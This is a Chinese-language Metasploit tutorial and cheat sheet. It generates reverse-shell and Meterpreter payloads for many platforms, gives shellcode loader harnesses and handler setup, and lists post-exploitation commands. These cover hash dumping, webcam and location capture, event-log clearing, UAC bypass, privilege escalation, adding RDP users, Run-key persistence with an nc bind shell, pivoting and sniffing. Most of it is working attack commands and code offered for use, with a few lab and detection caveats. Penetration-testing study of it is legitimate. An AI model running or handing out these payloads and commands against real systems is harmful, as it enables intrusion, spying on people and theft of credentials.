# Metasploit

{% embed url="https://github.com/rapid7/metasploit-framework" %}

{% embed url="https://github.com/rapid7/metasploit-payloads" %}

Metasploit 是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，同时该工具也是渗透测试环境中的利器，它支持多平台Payload的生成具有完全的跨平台性，本次实验将学会生成各种攻击载荷。

**快速安装Metasploit** Linux 系统下只需执行下面这一行（由下载、授权、运行三步串起来的命令）即可自动安装，不过国内网速你懂的。注意：这是把网络上下载的脚本直接以当前用户（通常是 root）执行，属于典型的供应链风险点——建议先查看下载到的 `msfinstall` 内容再执行最后一步，并确认下载走的是 HTTPS。

```
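# Download the Rapid7 omnibus installer, then run it as the current user
# (the package install itself needs root). -f makes curl fail on an HTTP
# error instead of saving an error page that the next step would execute;
# -L follows redirects; -sS stays quiet but still reports errors.
# Inspect msfinstall before the last step if you do not want to run
# unreviewed code fetched from the network.
curl -fsSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
  -o msfinstall && chmod 755 msfinstall && ./msfinstall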
```

## **关于Msfvenom命令常用参数解释**

```
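[root@localhost ~]# msfvenom --help

      -p, --payload    <payload>       Payload to use (--list payloads to enumerate them)
      -l, --list       [module_type]   List modules of a type: payloads, encoders, nops, platforms, archs, encrypt, formats, all
      -n, --nopsled    <length>        Prepend a NOP sled of the given length to the payload
      -f, --format     <format>        Output format (--list formats)
      -e, --encoder    [encoder]       Encoder to apply (--list encoders)
      -a, --arch       <architecture>  Target architecture of the payload
          --platform   <platform>      Target platform of the payload
      -s, --space      <length>        Maximum size of the resulting payload
      -b, --bad-chars  <list>          Bytes the payload must not contain, two hex digits each, e.g. '\x00\xff'
      -i, --iterations <count>         Number of encoding passes
      -o, --out        <path>          Write the payload to a file instead of stdout
          --smallest                   Generate the smallest possible payload (not "--shellest")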
```

**Windows ShellCode**

```
# x86 Meterpreter reverse-TCP stager as a C byte array (-f c). -b drops NUL and
# vertical-tab bytes from the output. LHOST/LPORT are the listener the stager
# connects back to; the multi/handler must use the same payload name and
# architecture or the connection arrives but no session is established.
[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
-b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c

# x64 variant: both -a and the payload path (windows/x64/...) change.
[root@localhost ~]# msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp \
-b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c
```

**Windows EXE Or DLL**

```
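# x86 Meterpreter reverse-TCP stager as a standalone PE, run through the
# shikata_ga_nai encoder three times (-e/-i). Encoding exists to satisfy -b
# constraints; it is not a reliable AV bypass and each pass grows the file.
[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -e x86/shikata_ga_nai -i 3 -b '\x00\x0a\xff' -f exe -o payload.exe

# Same stager packaged as a DLL; it executes when a process loads the library.
# Bad-chars need two hex digits each: the original '\x0\x0b' did not exclude NUL.
[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f dll -o payload.dll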
```

**Linux ShellCode**

```
# Linux Meterpreter reverse-TCP stager as a C byte array (-f c), for embedding
# in a loader such as the test harness further down this page. Pair it with a
# multi/handler configured for the identical payload name and architecture.
[root@localhost ~]# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f c

# x64 variant: both -a and the payload path (linux/x64/...) change.
[root@localhost ~]# msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f c
```

**Linux ELF Or ELF-SO**

```
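# Linux Meterpreter as a standalone ELF. The file needs the execute bit
# (chmod +x) on the target before it can run. The original x86 and x64 lines
# both wrote payload.elf, so the second silently overwrote the first; they now
# get distinct names.
[root@localhost ~]# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp -b '\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f elf -o payload_x86.elf

[root@localhost ~]# msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b '\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f elf -o payload_x64.elf

# Shared-object form: runs when the library is loaded into a process
# (e.g. LD_PRELOAD or dlopen()), not as a standalone executable.
[root@localhost ~]# msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b '\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f elf-so -o payload.so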
```

**Mac OS X ShellCode**

```
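# macOS reverse shell as a C byte array. Two fixes against the original:
# the option is lhost (not "lhhost" -- LHOST is required, so msfvenom aborts
# without it), and bad-chars need two hex digits each ('\x0' is not NUL).
[root@localhost ~]# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp \
-b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c

[root@localhost ~]# msfvenom -a x64 --platform osx -p osx/x64/shell_reverse_tcp \
-b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c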
```

**Mac OS X Macho**

```
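# macOS reverse shell as a Mach-O executable. Bad-chars must be written as
# '\x0b'; the original '\0b' is not a byte escape msfvenom understands.
# Distinct output names so the x64 build does not overwrite the x86 one.
[root@localhost ~]# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp -b '\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f macho -o payload_x86.macho

[root@localhost ~]# msfvenom -a x64 --platform osx -p osx/x64/shell_reverse_tcp -b '\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f macho -o payload_x64.macho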
```

**Android Or Iphone App**

```
# Android Meterpreter: with --platform android and no -f, msfvenom writes an
# APK (signed with a locally generated key). Installing it still requires the
# device to allow apps from unknown sources and the user to accept the
# requested permissions.
[root@localhost ~]# msfvenom --platform android -p android/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -o payload.apk

# iOS arm64 stageless Meterpreter. The output is not an installable .ipa; it
# is a binary that has to be executed on a device able to run unsigned code
# (in practice a jailbroken one) -- check the payload's own documentation.
[root@localhost ~]# msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp \
lhost=192.168.1.20 lport=9999 -o payload.ios
```

**PHP Or ASP Or JSP**

```
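# PHP Meterpreter. The raw output begins with the opening tag wrapped in a
# comment (/*<?php /**/); if the web server serves the file as text instead
# of executing it, make the first line a bare <?php.
[root@localhost ~]# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.20 lport=9999 -f raw -o shell.php

# ASPX page carrying a Windows x86 Meterpreter stager; -a must match the
# bitness of the IIS worker process that will run it.
[root@localhost ~]# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f aspx -o payload.aspx

# JSP reverse shell as a single page.
[root@localhost ~]# msfvenom --platform java -p java/jsp_shell_reverse_tcp \
lhost=192.168.1.20 lport=9999 -f raw -o payload.jsp

# The same shell as a deployable WAR (e.g. Tomcat manager). The original used
# '-f raw' with a .war filename, which only renames the JSP text; a servlet
# container needs the real archive that '-f war' produces.
[root@localhost ~]# msfvenom -p java/jsp_shell_reverse_tcp \
lhost=192.168.1.20 lport=9999 -f war -o payload.war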
```

**BASH Or PowerShell**

```
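# Bash reverse shell. The original line read '> -f raw >', which made the shell
# redirect msfvenom's output into a file literally named "-f" and left "raw"
# as a stray argument; the format flag must be a normal argument.
# The generated payload is a one-liner that opens /dev/tcp/LHOST/LPORT, so it
# only works where the shell is bash with /dev/tcp support.
[root@localhost ~]# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.sh
# The core of what that payload does: open fd 5 as a TCP socket to the listener.
[root@localhost ~]# exec 5<>/dev/tcp/192.168.1.20/9999

# PowerShell form of the Windows x86 stager. '-f psh' emits a .ps1 script.
# The original used '-f psh-cmd', which emits a cmd.exe one-liner
# ("powershell ... -e <base64>") and is not valid content for a .ps1 file.
[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
-b '\x00\x0b' LHOST=192.168.1.20 lport=9999 -f psh -o payload.ps1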
```

**Python Or Ruby Or NodeJS**

```
# Script-language payloads are delivered as plain source and need the matching
# interpreter (python, ruby, lua, node, perl) present on the target.
[root@localhost ~]# msfvenom -p python/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f raw -o payload.py

[root@localhost ~]# msfvenom -p ruby/shell_reverse_tcp \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.rb

# cmd/unix/* payloads are command lines (here "lua -e ..."), not source files,
# despite the .lua / .pl names used below.
[root@localhost ~]# msfvenom -p cmd/unix/reverse_lua \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.lua

[root@localhost ~]# msfvenom -p nodejs/shell_reverse_tcp \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.js

[root@localhost ~]# msfvenom -p cmd/unix/reverse_perl \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.pl
```

**服务端配置后门回弹会话(通用)**

```
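msf5 > use exploit/multi/handler
# The payload name (including x86 vs x64) must be exactly what msfvenom was
# given; a mismatch shows a connection that never turns into a session.
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# LHOST is the address the target connects back to, so it must be reachable
# from the target's network, not just the attacker's local interface.
msf5 exploit(multi/handler) > set lhost 192.168.1.20
msf5 exploit(multi/handler) > set lport 9999
# Keep listening after the first session so several implants can use one handler.
msf5 exploit(multi/handler) > set ExitOnSession false
# -j run as a background job, -z do not interact with the session automatically
msf5 exploit(multi/handler) > exploit -j -z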
```

**Windows: 附上ShellCode有效性测试框架**

```
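#include <Windows.h>
#include <stdio.h>
#include <string.h>
/* Only the commented-out direct-call variant in main() needs this: it makes
 * the .data section readable/writable/executable so buf can run in place.
 * The VirtualAlloc path below does not depend on it. */
#pragma comment(linker, "/section:.data,RWE")

/* Paste the msfvenom output here (`msfvenom ... -f c` emits exactly this array). */
unsigned char buf[] = "";

typedef void(__stdcall *CODE) ();

/*
 * Minimal shellcode test harness for Windows.
 *
 * Copies buf into a fresh private allocation and jumps to it. Returns 1 when
 * buf is still the empty placeholder or VirtualAlloc fails; control normally
 * never comes back from StartShell(), so the final return is only reached if
 * the shellcode itself returns.
 */
int main()
{
    /* Direct-call variant; requires the RWE .data pragma above. */
    //((void(*)(void))&buf)();

    /* sizeof(buf) counts the terminating NUL, so the empty placeholder has size 1. */
    if (sizeof(buf) <= 1) {
        fprintf(stderr, "buf is empty: paste the msfvenom -f c output first\n");
        return 1;
    }

    /* RWX rather than RX on purpose: msfvenom encoders (e.g. shikata_ga_nai)
     * decode the payload in place, so the page must stay writable while it
     * runs. Use PAGE_EXECUTE_READ only for payloads generated without -e. */
    PVOID pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pFunction == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(pFunction, buf, sizeof(buf));

    CODE StartShell = (CODE)pFunction;
    StartShell();
    return 0;
}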
```

**Linux: 附上ShellCode有效性测试框架**

```
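/*
 * Minimal shellcode test harness for Linux.
 *
 * The original listing (two separate programs pasted into one block, which
 * does not even compile as written) cast a const array / string literal to a
 * function pointer and called it. Those bytes live in .rodata, which is mapped
 * read-only and non-executable on any NX-enabled system, so the call faults
 * immediately; on recent x86-64 kernels even `-z execstack` no longer makes
 * data pages executable. This version copies the bytes into an anonymous
 * mapping created with PROT_EXEC and jumps there, so a plain
 * `gcc -o harness harness.c` is enough.
 *
 * Replace the array below with the output of `msfvenom ... -f c`; the bytes
 * here are only a placeholder stub.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

unsigned char shellcode[] = "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9";

int main(void)
{
    /* sizeof() includes the trailing NUL; strlen(), as the original used, stops
     * at the first \x00 inside real shellcode and would under-report. */
    size_t len = sizeof(shellcode);
    printf("Length: %zu\n", len - 1);

    /* RWX rather than RX on purpose: msfvenom encoders (e.g. shikata_ga_nai)
     * decode the payload in place, so the page must stay writable while it
     * runs. Drop PROT_WRITE if you only test payloads generated without -e. */
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        return EXIT_FAILURE;
    }
    memcpy(mem, shellcode, len);

    /* Control normally never returns; exit(0) is only reached if it does. */
    void (*run)(void) = (void (*)(void))mem;
    run();
    exit(0);
}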
```

**后渗透基础命令**

```
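# msfconsole side: session management
msf5 exploit(multi/handler) > sessions          # list current sessions
msf5 exploit(multi/handler) > sessions -i 1     # interact with a session by ID
msf5 exploit(multi/handler) > sessions -k 1     # kill a session by ID

# Meterpreter side -- the prompt is "meterpreter >" once inside a session;
# these are not msfconsole commands.
meterpreter > background        # put the session in the background, back to the msf prompt
meterpreter > getuid            # user the Meterpreter process runs as
meterpreter > getpid            # PID of the Meterpreter process
meterpreter > sysinfo           # target OS, hostname and architecture
meterpreter > ps                # process list on the target
meterpreter > kill PID          # terminate a target process by PID
meterpreter > getsystem         # try to escalate to SYSTEM (Windows; generally needs an elevated/admin process)
meterpreter > shell             # drop to a native shell on the target

meterpreter > enumdesktops      # list available desktops / window stations
meterpreter > getdesktop        # desktop Meterpreter is currently attached to
meterpreter > setdesktop        # attach to another desktop (the command is setdesktop, not set_desktop)
meterpreter > screenshot        # capture the screen
meterpreter > run vnc           # legacy VNC script; very visible to the logged-in user

meterpreter > uictl disable mouse    # disable the target's mouse
meterpreter > uictl enable keyboard  # re-enable the target's keyboard

meterpreter > webcam_list       # list the target's webcams
meterpreter > webcam_snap       # take a single picture from a webcam
meterpreter > webcam_stream     # stream a webcam
# Clear the Windows event logs (Application/System/Security). The command is
# clearev (the original "clearav" does not exist). Note the clearing itself is
# logged -- Security 1102 / System 104 -- and is a standard SOC alert, so this
# is not a quiet action.
meterpreter > clearev

# Android Meterpreter only
meterpreter > webcam_stream -i 1/2   # front or back camera
meterpreter > check_root             # is the device rooted
meterpreter > dump_calllog           # pull the call log
meterpreter > dump_contacts          # pull the contact list
meterpreter > geolocate              # location fix; the map link it prints needs Google Maps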
```

**Migrate进程迁移**

```
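# These run at the Meterpreter prompt, not in msfconsole.
meterpreter > execute -f cmd.exe            # run a program on the target (-f is required)
meterpreter > execute -H -i -f cmd.exe      # -H hidden window, -i interact with it through a channel

# Migrate Meterpreter into another process, typically a long-lived one so the
# session survives the original dropper exiting. Choose a process with the
# same architecture as the payload and one your current privileges can open;
# migrating into a process you cannot open simply fails.
meterpreter > getpid
meterpreter > ps
meterpreter > migrate PID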
```

**文件查阅与远程传输**

```
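# Meterpreter file commands. Backslashes in Windows paths are doubled at the
# meterpreter prompt.
meterpreter > getwd                                # target's current working directory
meterpreter > search -f *filename*                 # search the target for files by name pattern
meterpreter > cat c:\\lyshark.log                  # print a target file
meterpreter > upload /tmp/shell.exe C:\\shell.exe  # attacker file -> target
meterpreter > download c:\\shell.exe /tmp/         # target file -> attacker's /tmp/
meterpreter > edit c:\\lyshark.log                 # edit or create a target file (vim)
meterpreter > rm C:\\lyshark.log                   # delete a target file
# The "l" variants act on the attacker's own machine, not the target
# (the original described getlwd as the target's directory -- it is the local one).
meterpreter > getlwd                               # attacker-side working directory
meterpreter > lcd /tmp                             # change the attacker-side working directory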
```

**网络与端口转发/端口扫描**

```
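# Meterpreter prompt: network view from the target
meterpreter > ifconfig        # target's interfaces and addresses
meterpreter > netstat -antp   # target's network connections
meterpreter > arp -a          # target's ARP cache
meterpreter > getproxy        # target's proxy configuration
meterpreter > route           # target's routing table
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24   # ARP sweep of a subnet from the target
# Port scan from msfconsole; once a route via this session exists (autoroute
# below) the scanner reaches hosts behind the target.
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.100
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 3389
msf5 auxiliary(scanner/portscan/tcp) > run

#-----------------------------------------------------------------------
# portfwd: expose a port reachable from the target on the attacker's machine.
# -r is the host as seen from the target, so 127.0.0.1 means the target itself.
meterpreter > portfwd add -l 9999 -p 3389 -r 127.0.0.1   # target:3389 -> attacker localhost:9999
meterpreter > portfwd list                               # list active forwards
meterpreter > portfwd delete -l 9999                     # remove the forward on local port 9999

#-----------------------------------------------------------------------
# autoroute: make a subnet behind the target reachable to other Metasploit
# modules through this session (pivoting). Only Metasploit modules honour
# these routes; external tools need a separate proxy.
meterpreter > run autoroute -p                              # show routes
meterpreter > run autoroute -s 10.10.10.1 -n 255.255.255.0  # add a route via this session
meterpreter > run autoroute -d -s 10.10.10.1                # delete that route
meterpreter > run autoroute -s 10.10.10.1/24                # same, in CIDR form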
```

**后渗透信息搜集模块**

```
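#-----------------------------------------------------------------------
# On a CentOS omnibus install the post modules live here
[root@localhost post]# cd /opt/metasploit-framework/embedded/framework/modules/post/
[root@localhost post]# ls
aix  android  apple_ios  brocade  cisco  firefox  hardware  juniper  linux  multi  osx  solaris  windows

# The Windows information-gathering modules, for example, are under:
[root@localhost gather]# pwd
/opt/metasploit-framework/embedded/framework/modules/post/windows/gather

#-----------------------------------------------------------------------
# There are many gather modules; a few commonly used ones:

meterpreter > info post/windows/gather/enum_files           # show a module's options
meterpreter > run post/windows/gather/enum_files            # search the target for files matching a pattern (the original mislabeled this as "services")
meterpreter > run post/windows/gather/enum_services         # enumerate services
meterpreter > run post/windows/gather/hashdump              # dump local SAM hashes (needs SYSTEM)
meterpreter > run post/windows/gather/checkvm               # is the target a VM
meterpreter > run post/windows/gather/forensics/enum_drives # enumerate drives / partitions
meterpreter > run post/windows/gather/enum_applications     # installed software
meterpreter > run post/windows/gather/dumplinks             # recently used files from .lnk entries
meterpreter > run post/windows/gather/enum_ie               # IE history / cookies / cache
meterpreter > run post/windows/gather/enum_chrome           # Chrome history / cookies / saved data
meterpreter > run post/windows/gather/enum_patches          # installed patches, to match against local exploits
meterpreter > run post/windows/gather/enum_domain           # find the domain controller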
```

**针对肉鸡的提权操作**

```
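#-----------------------------------------------------------------------
# UAC bypass: only relevant when the current user is already a local admin
# running at medium integrity. It does not grant rights the user lacks.
meterpreter > background
msf > use exploit/windows/local/bypassuac
msf > set SESSION 1
msf > run

#-----------------------------------------------------------------------
# Local privilege escalation: list missing patches, then pick a matching
# exploit/windows/local module. "KB missing" is a hint, not proof of
# exploitability -- check the module's targets and the session architecture
# first, since a failed kernel exploit can crash the host.
# post/multi/recon/local_exploit_suggester automates the matching step.
meterpreter > run post/windows/gather/enum_patches
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7
meterpreter > background
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 1
msf > exploit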
```

**添加系统用户与开启3389远程**

```
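#-----------------------------------------------------------------------
# Enable RDP and add a local user. Both are loud: account creation (Windows
# event 4720) and service/firewall changes are routine detection triggers.
# getgui is the legacy script; post/windows/manage/enable_rdp is its
# module form and does the same things.
meterpreter > run getgui -e                                                     # enable RDP
meterpreter > run getgui -u lyshark -p 123123                                   # add a local user
meterpreter > run getgui -f 9999 -e                                             # enable RDP and forward target 3389 to local 9999
meterpreter > run post/windows/manage/enable_rdp                                # enable RDP
# The account is reachable from the network once RDP is on: use a strong,
# unique password in a real engagement, not the example below.
meterpreter > run post/windows/manage/enable_rdp USERNAME=lyshark PASSWORD=123  # add a user
meterpreter > run post/windows/manage/enable_rdp FORWARD=true LPORT=9999        # forward target 3389 to local 9999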
```

**注册表操作与写入后门**

```
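-d   value data    -k   registry key path    -v   value name
enumkey  list a key's subkeys/values    setval  write a value    queryval  read a value
#-----------------------------------------------------------------------
# Persistence via the HKLM Run key: runs at every user logon. Writing under
# HKLM needs administrative rights in the session.
meterpreter > upload /root/nc.exe C:\\windows\\                                       # drop nc.exe into C:\Windows (not the drive root)
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run  # list existing Run entries
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v myshell -d 'C:\windows\nc.exe -Ldp 666 -e cmd.exe'
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v myshell    # verify the value

# The value above starts an unauthenticated bind shell on TCP/666 (-L re-listen
# after each client, -p port, -e hand the connection to cmd.exe). Anyone who can
# reach that port gets a shell, not only the tester: use it only in an isolated
# lab, and remove the Run value and nc.exe during cleanup. Run-key entries are
# also one of the first places defenders look for persistence.
# 192.168.1.20 is the attacker's LHOST elsewhere on this page; connect to the
# target's address here.
[root@localhost ~]# nc -v <target-ip> 666   # attacker connects to the bind shell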
```

**目标网卡抓包**

```
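# The packet sniffer is a Meterpreter extension loaded into the session
# (Windows targets), not an msfconsole module -- so the prompt is
# "meterpreter >" and the command is load. Captured packets are held on the
# target until dumped; the pcap is then written on the attacker side.
meterpreter > load sniffer
meterpreter > sniffer_interfaces             # list the target's interfaces
meterpreter > sniffer_start 1                # start capturing on interface 1
meterpreter > sniffer_stats 1                # capture statistics
meterpreter > sniffer_dump 1 /tmp/ltest.pcap # save the capture as a pcap
meterpreter > sniffer_stop 1                 # stop capturing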
```

